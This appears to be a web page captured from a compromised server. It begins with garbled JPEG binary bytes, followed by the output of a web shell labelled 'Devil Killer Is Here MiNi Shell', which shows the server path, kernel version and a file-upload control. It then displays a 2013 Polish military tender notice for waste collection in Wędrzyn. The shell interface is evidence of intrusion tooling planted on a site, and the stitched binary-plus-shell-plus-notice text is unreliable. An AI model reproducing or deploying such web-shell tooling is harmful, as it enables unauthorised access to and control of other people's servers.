JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130110/14832-N-2013.html

<p class="kh_header"><b>Wędrzyn: WYKONYWANIE USŁUG POLEGAJĄCYCH NA: Odbiorze, transporcie i zagospodarowaniu odpadów wytwarzanych na terenach administrowanych przez Jednostkę Wojskową 5701 o kodach:  20 03 01; 20 03 07; 15 01 01; 15 01 02; 15 01 07</b><br>
<b>Numer ogłoszenia: 14832 - 2013; data zamieszczenia: 10.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONYWANIE USŁUG POLEGAJĄCYCH NA: Odbiorze, transporcie i zagospodarowaniu odpadów wytwarzanych na terenach administrowanych przez Jednostkę Wojskową 5701 o kodach:  20 03 01; 20 03 07; 15 01 01; 15 01 02; 15 01 07.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa wywozu nieczystości stałych  z kompleksów administrowanych przez JW nr 5701 i przekazania ich do składowania i utylizacji.
2.	Usługa świadczona będzie na terenach gmin : Sulęcin, Międzyrzecz, Skwierzyna  i Gorzów Wlkp.
3.	Zamawiający wytwarza następujące odpady  o kodach :  
- 20 03 01 -  nie segregowane (zmieszane)  odpady komunalne,
- 20 03 07 - odpady wielkogabarytowe,
- 15 01 01 - opakowania z papieru i tektury (gromadzone selektywnie)
- 15 01 02 - opakowania z tworzyw sztucznych (gromadzone selektywnie)
- 15 01 07 - opakowania ze szkła (gromadzone selektywnie)
                nadanych zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 września 2001r. w sprawie katalogu odpadów.
4.	Wykonawca obowiązany  jest posiadać decyzję w zakresie zbierania odpadów  oraz decyzje w zakresie  transportu odpadów o kodach 20 03 01, 20 03 07, 15 01 01,               15 01 02 oraz 15 01 07 wydaną zgodnie z art. 28 ustawy z dnia 27 kwietnia 2001 r.           o odpadach  (Dz.U. 2010, nr 185, poz.1243 z późniejszymi zmianami) , na terenach objętych świadczeniem usługi , tj. gminy Sulęcin, Międzyrzecz, Skwierzyna i Gorzów Wlkp.
5.	Gromadzenie odpadów i ich wywóz  odbywać się będzie w pojemnikach stanowiących własność Wykonawcy.
6.	Szacunkowa ilość odpadów do wywiezienia w okresie trwania umowy,  w  m3 (tabela w siwz)
7.	Wykonawca z chwila podpisania umowy na świadczenie usługi wystawi  pojemniki do gromadzenia odpadów w ilości i miejscach podanych w formularzu cenowym.
8.	Zamawiający wymaga zabezpieczenia przez Wykonawcę niżej wymienionych  typów pojemników w ilościach zgodnych z Załącznikiem nr 2 do SIWZ:
- pojemnik o pojemności 7m3 - stalowy typu KP-7 lub o podobnej konstrukcji,
- pojemnik o pojemności 1,1 m3 - stalowy z odsuwaną pokrywą, na czterech kołach z możliwością blokady.
- pojemniki do zbiórki selektywnej odpadów o pojemności 1,1 m3 - stalowe, na czterech kołach z możliwością blokady, z pokrywą wyposażoną w otwory do wrzucania odpowiedniego rodzaju odpadu, zamknięta na stałe w sposób uniemożliwiający jej otwarcie przez osoby postronne.
9.	Wykonawca jest odpowiedzialny za stan  techniczny i czystość pojemników.
10.	Wystawione pojemniki winny być sprawne technicznie, estetyczne i szczelne, 
11.	W przypadku zużycia pojemników w wyniku eksploatacji, Wykonawca obowiązany jest je wymienić na własny koszt. 
12.	Wykonawca zobowiązany jest do wykonania mycia i  dezynfekcji pojemników  przynajmniej 1 raz na rok, ( 2 razy w ciągu trwania umowy).
13.	Wywóz nieczystości odbywać się będzie z częstotliwością podaną w formularzu cenowym, a w szczególnych przypadkach na zgłoszenie telefoniczne zamawiającego w ciągu 12 godzin od zgłoszenia.
14.	Zamawiający wraz z Kierownikami poszczególnych Sekcji Obsługi Infrastruktury ustali  harmonogram  określający dni tygodnia w których odbywać się będzie wywóz nieczystości.
15.	Zamawiający zastrzega sobie prawo do zmiany częstotliwości odbioru  nieczystości spowodowanej np. czasowym  niewykorzystywaniem obiektów itp.
16.	Zamawiający zastrzega sobie prawo do zmiany lokalizacji pojemników podanej w formularzu cenowym.
17.	Wywóz odpadów gabarytowych odbywać się będzie w terminie uzgodnionym  przez strony lub w razie nagłych potrzeb na zgłoszenie telefoniczne przez Zamawiającego, w ciągu 24 od zgłoszenia.
18.	W przypadku zawarcia umowy na świadczenie usługi Zamawiający ustali z Wykonawcą harmonogram odbioru nieczystości  określający  dni tygodnia w których będą odbierane odpady.
19.	Wykonawca obowiązany jest posiadać tabor samochodowy przystosowany do wywozu nieczystości i obsługi wystawionych pojemników. 
20.	Wykonawca obowiązany jest posiadać tabor samochodowy w  ilości  umożliwiającej  obsługę  wszystkich pojemników w ciągu jednego dnia.
21.	Wykonawca w trakcie świadczenia usługi zobowiązany jest do przestrzegania :
- Ustawy z dnia 13 września 1996r. (wraz z późniejszymi zmianami) o utrzymaniu czystości i porządku w gminach,
- Regulaminów utrzymania czystości i porządku na terenach gmin Sulęcin, Międzyrzecz, Skwierzyna i Gorzów Wlkp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> . Ustala się wadium w wysokości:
    kwota 25.000,00 zł brutto (słownie: dwadzieścia pięć tysięcy złotych 00/100),                                        
2. Wadium należy wnieść przed upływem terminu składania ofert. 
    Wadium można wnieść w   jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824 z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
NBP oddział w Zielonej Górze nr 28 1010 1704 0060 0213 9120 1000 z dopiskiem: Przetarg nieograniczony na: 
  Odbiór, transport i zagospodarowanie odpadów o kodach:
    20 03 01; 20 03 07; 15 01 01; 15 01 02; 15 01 07.                                   
Stosowny dowód potwierdzający wniesienie wadium należy załączyć do oferty.

Termin ważności wadium złożonego w innej formie niż pieniądz, powinien obejmować cały okres związania ofertą. W przypadku form innych niż pieniądz, musi być precyzyjnie określone: kto jest gwarantem, beneficjentem oraz zleceniodawcą gwarancji, wysokość kwoty gwarancji, termin ważności oraz zobowiązanie podmiotu udzielającego gwarancji do zapłaty wadium w przypadkach przewidzianych w art. 46 ustawy, mianowicie: Wykonawca, którego oferta została wybrana odmówi podpisania umowy na warunkach określonych w ofercie, nie wniesie zabezpieczenia należytego wykonania umowy, zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy, Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 cyt. ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.  
Również poręczenie musi precyzyjnie określać, za kogo poręczyciel dokonuje poręczenia, do jakiej wysokości i na jaki czas oraz wskazywać przedmiot poręczenia.
Z treści gwarancji lub poręczenia musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta (poręczyciela). Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikacją np. złożony wraz z imienną pieczątką lub czytelny  (z podaniem imienia i nazwiska). 
Gwarancja lub poręczenie powinno zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego - zgłoszone w terminie związania ofertą - wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji i art. 46 ust. 4 a i 5 ustawy - następuje jego bezwarunkowa wypłata, bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 
Dowodem wniesienia wadium w innej formie niż pieniądz jest załączenie do oferty kopii gwarancji lub poręczenia. Oryginał dokumentu (wadium w formie niepieniężnej) należy zdeponować w kancelarii jawnej (bud.33  II piętro, pok.211), wskazanej jako miejsce składania ofert w terminie tożsamym, z terminem składania ofert, tj. do 20.02.2013r. do godz. 8.45.
W przypadku wniesienia odwołania po otwarciu ofert Zamawiający, nie później niż na 7 dni przed upływem ważności wadium, wzywa Wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie kieruje się jedynie do Wykonawcy, którego ofertę wybrano jako najkorzystniejszą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu określone w art. 22 ust. 1 Ustawy, tzn.:
1)	złożą oświadczenie o spełnianiu warunków określone w art. 44 ustawy Prawo zamówień publicznych oraz o braku podstaw  do wykluczenia - art. 22 ust.1 oraz art. 24 ust. 1 Pzp (wg wzoru zawartego w Załącznik nr 3, 4 do SIWZ);
2)	złożą kserokopię aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku osób fizycznych oświadczenie w zakresie art. 24 ust.1 pkt.2 tj., że  nie zachodzi w stosunku do nich przesłanka wykluczenia określona w tym artykule. Zamawiający  wyklucza z postępowania wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego (Załącznik nr 5 do SIWZ);
3)	złożą kserokopię aktualnego zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż           3 miesiące przed upływem terminu składania ofert;
4)	złożą kserokopię aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5)	złożą aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy, wystawionej nie wcześniej niż        6 miesięcy przed upływem terminu składania ofert; 
6)	złożą aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dotyczy podmiotów zbiorowych w rozumieniu ustawy z dn. 28 października 2002r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary  Dz. U. z 2002r. Nr 197, poz. 1661 z późn. zm.);
   7)   złożą decyzję w zakresie zbierania odpadów o kodach: 20 03 01, 20 03 07, 
         15 01 01, 15 01 02, 15 01 07, na terenach objętych świadczeniem usługi tj.: m. 
        Wędrzyn (gmina Sulęcin), m.  Skwierzyna (gmina Skwierzyna), m. Międzyrzecz 
        (gmina Międzyrzecz), m. Gorzów Wlkp. (gmina Gorzów Wlkp.) wydaną zgodnie
          z art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. 2010, nr 185, 
         poz. 1243 z późniejszymi zmianami). 
  8)   złożą decyzję w zakresie transportu odpadów o kodach: 20 03 01, 20 03 07, 
        15 01 01, 15 01 02, 15 01 07,  na terenach objętych świadczeniem usługi tj.: m. 
        Wędrzyn (gmina Sulęcin), m.  Skwierzyna (gmina Skwierzyna), m. Międzyrzecz 
(gmina Międzyrzecz), m. Gorzów Wlkp. (gmina Gorzów Wlkp.) wydaną zgodnie z art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. 2010, nr 185, poz. 1243 z późniejszymi zmianami), a w razie  jej braku umowę dotyczącą  transportu przedmiotowych odpadów do miejsca ich dalszego zagospodarowania oraz decyzję tego podmiotu w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług będących przedmiotem zamówienia w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, z których co najmniej jedna opiewa na wartość minimum  300 000,00 zł brutto;  a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
          Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu  wykonanych usług o podobnym charakterze i  dokumentów potwierdzających, że usługi te zostały prawidłowo ukończone; na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.	W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów: 
- kserokopii opłaconej polisy, a w przypadku jej braku innego dokumentu
   potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
   Wartość ubezpieczenia nie może być mniejsza niż:
    minimum 300 000,00 zł;
            Wykonawca zobowiązuje się, że będzie utrzymywał powyższy zakres ubezpieczenia do końca trwania umowy.
            Ocena spełniania warunku będzie dokonana na podstawie złożonego dokumentu na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy i cenowy z wykorzystaniem wzoru zamieszczonego w niniejszej SIWZ - Załącznik nr 1,  Załącznik nr 2 do SIWZ;
2)	decyzja w zakresie zbierania odpadów o kodach: 20 03 01, 20 03 07, 15 01 01, 15 01 02, 15 01 07, na terenach objętych świadczeniem usługi tj.: m. Wędrzyn (gmina Sulęcin), m.  Skwierzyna (gmina Skwierzyna), m. Międzyrzecz 
 (gmina Międzyrzecz), m. Gorzów Wlkp. (gmina Gorzów Wlkp.) wydaną zgodnie
 z art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. 2010, nr 185, 
 poz. 1243 z późniejszymi zmianami); 
3)  decyzja w zakresie transportu odpadów o kodach: 20 03 01, 20 03 07, 
 15 01 01, 15 01 02, 15 01 07,  na terenach objętych świadczeniem usługi tj.: m. 
 Wędrzyn (gmina Sulęcin), m.  Skwierzyna (gmina Skwierzyna), m. Międzyrzecz 
(gmina Międzyrzecz), m. Gorzów Wlkp. (gmina Gorzów Wlkp.) wydaną zgodnie  z art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. 2010, nr 185, poz.1243 z późniejszymi zmianami), a w razie  jej braku umowę dotyczącą  transportu przedmiotowych odpadów do miejsca ich dalszego zagospodarowania oraz decyzję tego podmiotu w tym zakresie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.
2.	Dopuszcza się dokonywanie zmian w umowie polegające na wprowadzeniu następujących zmian :
2.1.	Danych dotyczących stron umowy, jak zmiana nazwy, siedziby, adresu, numeru konta bankowego, itp.
2.2.	Terminu umowy - tylko w przypadku wystąpienia istotnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
2.3.	Stawki VAT w chwili wejścia w Zycie odpowiednich przepisów prawnych , co skutkuje ponownym przeliczeniem wartości przedmiotu zamówienia proporcjonalnie do wielkości zmiany po obowiązujących stawkach, w celu określenia wynagrodzenia po zmianach, które będzie obowiązywać z chwila podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
